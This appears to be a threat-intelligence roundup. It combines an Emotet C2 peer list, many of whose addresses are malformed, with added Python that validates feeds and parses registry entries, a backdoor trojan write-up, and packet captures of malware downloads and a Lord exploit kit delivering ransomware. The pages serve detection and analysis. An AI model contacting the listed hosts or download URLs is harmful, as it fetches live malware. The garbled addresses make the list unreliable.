Updated List of Emotet Banking Malware Trojan IP C2 Servers and Port Numbers

Emotet

Peers:
104.131.58132:8080
104.236.13772:8080
109.169.8613:8080
110.170.65146:80
111.125.7122:8080
112.218.134227:80
113.61.76239:80
116.48.138115:80
116.48.14832:80
118.36.70245:80
119.59.124163:8080
125.99.61162:7080
130.204.247253:80
138.68.1064:7080
139.162.11888:8080
14.160.93230:80
142.127.5763:8080
142.93.114137:8080
144.139.56105:80
144.217.117207:8080
149.62.173247:8080
151.237.36220:80
152.170.10899:443
159.203.204126:8080
163.172.40218:7080
165.228.19593:80
175.114.17883:443
178.79.163131:8080
181.198.20345:443
181.36.42205:443
181.61.143177:80
183.99.239141:80
185.160.2123:80
185.160.22926:80
185.86.148222:8080
186.15.8352:8080
186.68.48204:443
187.188.166192:8080
188.135.1549:80
188.216.24204:80
189.19.81181:443
190.100.153162:443
190.146.131105:8080
190.186.16423:80
190.195.129227:8090
190.210.184138:995
190.6.193152:8080
190.97.30167:990
191.103.7634:443
191.183.21190:80
192.241.14684:8080
2.139.158136:443
2.42.173240:80
2.44.16752:80
2.45.112134:80
200.119.11118:443
200.124.22532:80
200.58.83179:80
201.213.3259:80
203.130.069:80
203.25.1593:8080
207.154.20440:8080
212.237.5061:8080
212.71.237140:8080
217.199.160224:8080
219.75.66103:80
223.255.148134:80
37.120.185153:443
37.183.12132:80
37.187.663:8080
37.211.49127:80
45.50.177164:80
45.79.95107:443
45.8.136201:80
46.101.212195:8080
46.28.111142:7080
5.196.35138:7080
5.32.41106:80
5.88.2767:8080
50.28.51143:8080
51.255.165160:8080
58.171.3826:80
62.75.143100:7080
62.75.160178:8080
63.246.252234:80
63.248.1988:80
68.129.203162:443
68.174.15223:80
68.183.170114:8080
68.183.190199:8080
68.187.16028:443
69.163.3384:8080
72.29.55174:80
73.60.8210:80
74.59.18794:80
74.79.10355:80
77.27.22124:443
77.55.21177:8080
79.7.1141:80
80.11.15865:8080
81.157.23490:8080
82.196.15205:8080
82.36.10314:80
82.8.23251:80
83.165.78227:80
83.248.141198:80
85.152.208146:80
85.234.14394:8080
86.42.166147:80
87.106.46107:8080
87.106.7740:7080
91.117.8359:80
91.204.16319:8090
91.205.21557:7080
91.74.17546:80
91.83.93124:7080
93.144.22657:80
93.148.25290:80
93.67.154252:443
94.200.114162:80
96.126.12164:443
96.38.23410:80
96.61.113203:80
97.120.32227:80
97.81.12153:80
99.252.276:80
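
The peer list above is the kind of feed that gets pasted straight into a blocklist, yet several entries as they appear on this page have lost the separator between their third and fourth octets and would not parse as addresses at all. The Python below is added here as an example and is not part of the original list: it validates each `ip:port` line with the standard library's `ipaddress` module before turning it into a Suricata alert rule, and rejects malformed lines instead of guessing where the missing dot belongs. The feed in `SAMPLE_FEED` is constructed (two of its lines are copied verbatim from the list above), and the `sid` numbering base is an arbitrary choice.

```python
"""Validate an Emotet-style "ip:port" C2 peer list before loading it into
a blocklist.  Added example, not part of the original page.  The feed
below is constructed: two well-formed entries, two entries copied from the
list above (third and fourth octets run together), one entry with an
out-of-range port, and one entry written in the defanged "[.]" form."""
from __future__ import annotations
import ipaddress
import re
from typing import NamedTuple


class Peer(NamedTuple):
    ip: str
    port: int


SAMPLE_FEED = """Peers:
198.51.100.23:8080
203.0.113.7:443
104.131.58132:8080
2.139.158136:443
198.51.100.24:99999
192.0.2[.]15:7080
"""

_LINE_RE = re.compile(r"^(?P<ip>[^:\s]+):(?P<port>\d+)$")


def parse_peer(line: str) -> Peer | None:
    """Return a Peer for a well-formed 'a.b.c.d:port' line, else None.
    Defanged '[.]' is refanged first because feeds are often published that way."""
    text = line.strip().replace("[.]", ".")
    m = _LINE_RE.match(text)
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m["ip"])  # rejects 3-octet forms and octets > 255
    except ipaddress.AddressValueError:
        return None
    port = int(m["port"])
    if not 1 <= port <= 65535:
        return None
    return Peer(str(ip), port)


def load_feed(text: str) -> tuple[list[Peer], list[str]]:
    """Split a feed into accepted peers and rejected raw lines.
    Blank lines and section headers such as 'Peers:' are skipped, not rejected."""
    accepted: list[Peer] = []
    rejected: list[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or (line.endswith(":") and ":" not in line[:-1]):
            continue
        peer = parse_peer(line)
        if peer:
            accepted.append(peer)
        else:
            rejected.append(line)
    return accepted, rejected


def suricata_rules(peers: list[Peer], base_sid: int = 9000001) -> list[str]:
    """Emit one outbound-connection alert rule per accepted peer."""
    rules = []
    for i, p in enumerate(peers):
        rules.append(
            f'alert tcp $HOME_NET any -> {p.ip} {p.port} '
            f'(msg:"Emotet C2 peer {p.ip}:{p.port}"; flow:to_server; '
            f'sid:{base_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    ok, bad = load_feed(SAMPLE_FEED)
    for rule in suricata_rules(ok):
        print(rule)
    for line in bad:
        print("REJECTED (repair the feed at its source, do not guess):", line)
```

Rejected lines are reported rather than dropped silently, so a feed that arrived damaged is noticed before the blocklist goes live with only part of its coverage.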

Trojan Malware BDaim-A is c000.exe vbc.exe Malicious X.509 SSL Certificate PCAP File Download Traffic Sample

Troj/BDaim-A is a backdoor trojan.

The Trojan installs itself as uvwxyz.exe in the Windows system folder and creates the following files, also in the system folder:

mswinsck.ocx (this is the clean Microsoft Winsock control)
raim.ocx

Troj/BDaim-A creates the following registry entry so that it automatically starts up with Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe

In addition, Troj/BDaim-A creates the following registry entries:

HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Host = "localhost"
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCU\Software\Microsoft\Visual Basic\
HKCU\Software\Microsoft\Visual Basic\6.0\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Control\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel = "Apartment"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\(default) = "0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\(default) = "132497"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\(default) = "MSWinsock.Winsock.1"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Programmable\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX, 1"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\(default) = "1.0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\(default) = "MSWinsock.Winsock"
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "Winsock General Property Page Object"
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "IMSWinsockControl"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\(default) = "{00020424-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\(default) = "{00020424-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "DMSWinsockControlEvents"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\(default) = "{00020420-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\(default) = "{00020420-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0"
HKCR\MSWinsock.Winsock\
HKCR\MSWinsock.Winsock\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\MSWinsock.Winsock.1\
HKCR\MSWinsock.Winsock.1\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\MSWinsock.Winsock.1\CLSID\
HKCR\MSWinsock.Winsock.1\CLSID\(default) = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\MSWinsock.Winsock\CLSID\
HKCR\MSWinsock.Winsock\CLSID\(default) = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\MSWinsock.Winsock\CurVer\
HKCR\MSWinsock.Winsock\CurVer\(default) = "MSWinsock.Winsock.1"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\(default) = "Microsoft Winsock Control 6.0 (SP5)"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\(default) = "2"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\(default) = ""
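
Most of the entries above are the ordinary COM registration of the WinSock control; the one that matters for persistence is the single Run value. As an added example (not Sophos' tooling and not from the page author), the Python below parses a listing in the form quoted above, one `KEY\Name = value` or bare key per line, and pulls out what an investigator wants from it: the autostart value that gives Troj/BDaim-A its persistence, and the CLSID-to-file mapping that shows the WinSock registration points at the legitimate MSWINSCK.OCX rather than at the trojan. `SAMPLE_LISTING` is a constructed subset of the entries above, and `AUTOSTART_PATHS` is a deliberately short list of Run/RunOnce keys.

```python
"""Parse a registry listing in the write-up's format and extract the
persistence and COM-server facts from it.  Added example, not the
vendor's code.  SAMPLE_LISTING is a constructed subset of the entries
quoted in the write-up."""
from __future__ import annotations
import re
from dataclasses import dataclass

SAMPLE_LISTING = r"""
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\(default) = "MSWinsock.Winsock.1"
"""

# Autostart key paths worth flagging (a short, well-known subset; compared case-insensitively).
AUTOSTART_PATHS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
)


@dataclass
class RegEntry:
    hive: str
    path: str                 # key path below the hive, without trailing backslash
    name: str | None          # value name; None for a bare key line
    value: str | int | None   # parsed value; None for a bare key line


def parse_value(raw: str) -> str | int:
    """'dword:0000103f' -> 4159; '"text"' -> text; anything else is returned as-is."""
    raw = raw.strip()
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1]
    return raw


def parse_line(line: str) -> RegEntry | None:
    """Split one listing line into hive, key path, value name and value."""
    line = line.strip()
    if not line:
        return None
    key, sep, val = line.partition(" = ")
    hive, _, path = key.partition("\\")
    if sep:  # value line: the last path component is the value name
        path, _, name = path.rpartition("\\")
        return RegEntry(hive, path, name, parse_value(val))
    return RegEntry(hive, path.rstrip("\\"), None, None)


def parse_listing(text: str) -> list[RegEntry]:
    return [e for e in (parse_line(ln) for ln in text.splitlines()) if e]


def autostart_entries(entries: list[RegEntry]) -> list[RegEntry]:
    """Values written under a Run/RunOnce key: what the malware relies on to restart."""
    return [e for e in entries
            if e.name is not None and e.path.lower() in AUTOSTART_PATHS]


def com_servers(entries: list[RegEntry]) -> dict[str, str]:
    """Map each registered CLSID to the file its InprocServer32 (default) value names."""
    out: dict[str, str] = {}
    for e in entries:
        m = re.fullmatch(r"CLSID\\(\{[0-9A-F-]+\})\\InprocServer32", e.path, re.I)
        if m and e.hive == "HKCR" and e.name == "(default)":
            out[m.group(1)] = str(e.value)
    return out


if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LISTING)
    for e in autostart_entries(entries):
        print(f"persistence: {e.hive}\\{e.path}\\{e.name} -> {e.value}")
    for clsid, path in com_servers(entries).items():
        print(f"COM server {clsid} -> {path}")
```

The parser splits on the first `" = "` so a value that itself contains spaces (the AOL key name, the quoted description strings) stays intact; the dword is converted so the AIM "Port" value reads as 4159 rather than a hex string.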

URLhaus Database

You are currently viewing the URLhaus database entry for http://f0384177.xsph.ru/LO/c000.exe which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and those that have been set up by cybercriminals for the sole purpose of serving malware.

Database Entry

ID: 286246
URL: http://f0384177.xsph.ru/LO/c000.exe
URL Status: Offline
Host: f0384177.xsph[.]ru
Date added: 2020-01-11 10:33:04 UTC
Threat: Malware download

2020-01-16 06:45:23.373218 IP 192.168.86.25.56261 > 151.80.241.110.80: Flags [P.], seq 1:432, ack 1, win 16425, length 431: HTTP: GET /mich/vbc.exe HTTP/1.1
E….q@…S/..V..P.n…P…*.WWkP.@).A..GET /mich/vbc.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: windowsdefenderserversecureserver.duckdns.org
Connection: Keep-Alive

2020-01-16 06:45:23.474701 IP 151.80.241.110.80 > 192.168.86.25.56261: Flags [.], seq 1:1461, ack 432, win 513, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.p.N..P.n..V..P…WWk….P…d…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:45:23 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 16 Jan 2020 04:32:10 GMT
ETag: "16ea00-59c3a4efb28b9"
Accept-Ranges: bytes
Content-Length: 1501696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-01-16 06:45:52.794502 IP 192.168.86.25.56262 > 141.8.192.151.80: Flags [P.], seq 1:402, ack 1, win 16425, length 401: HTTP: GET /LO/c000.exe HTTP/1.1
E…..@….
..V……..PU.wZ.^3eP.@)….GET /LO/c000.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: f0384177.xsph.ru
Connection: Keep-Alive

2020-01-16 06:45:52.966457 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], ack 402, win 237, length 0
E..(J>@.+..0……V..P…^3eU.x.P………….
2020-01-16 06:45:53.040728 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], seq 1:1461, ack 402, win 237, length 1460: HTTP: HTTP/1.1 503 Service Unavailable
E…J?@.+..{……V..P…^3eU.x.P…….HTTP/1.1 503 Service Unavailable
Server: openresty
Date: Thu, 16 Jan 2020 11:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

2806




<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<link rel="stylesheet" type="text/css" href="https://index.from.sh/fonts.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/index.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/stub.css?10" />

2020-01-16 06:45:53.391894 IP 192.168.86.25.56265 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
[TLS ClientHello; server name extension (SNI): index.from.sh]
2020-01-16 06:45:53.392017 IP 192.168.86.25.56266 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
[TLS ClientHello; server name extension (SNI): index.from.sh]
2020-01-16 06:45:53.528765 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], ack 127, win 229, length 0
2020-01-16 06:45:53.530363 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1:1461, ack 127, win 229, length 1460
[TLS ServerHello and Certificate; fields readable in the leaf certificate bytes:
  Issuer: C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA
  Validity: 180312000000Z to 200311235959Z (2018-03-12 to 2020-03-11)
  Subject: OU=Domain Control Validated, OU=Hosted by OnlineNic Inc, OU=PositiveSSL, CN=index.from.sh
  Subject Alternative Name: index.from.sh, www.index.from.sh
  CPS: https://secure.comodo.com/CPS
  CRL: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl
  CA Issuers: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt
  OCSP: http://ocsp.comodoca.com]
2020-01-16 06:45:53.530672 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1461:2921, ack 127, win 229, length 1460
[Certificate chain continued; fields readable in the intermediate certificate bytes:
  Issuer: C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Certification Authority
  Subject: C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA
  Validity: 140212000000Z to 290211235959Z (2014-02-12 to 2029-02-11)
  CRL: http://crl.comodoca.com/COMODORSACertificationAuthority.crl
  CA Issuers: http://crt.comodoca.com/COMODORSAAddTrustCA.crt
  OCSP: http://ocsp.comodoca.com]

Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename="Server.exe";

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
[1460 bytes of the Server.exe body; binary, not printable]
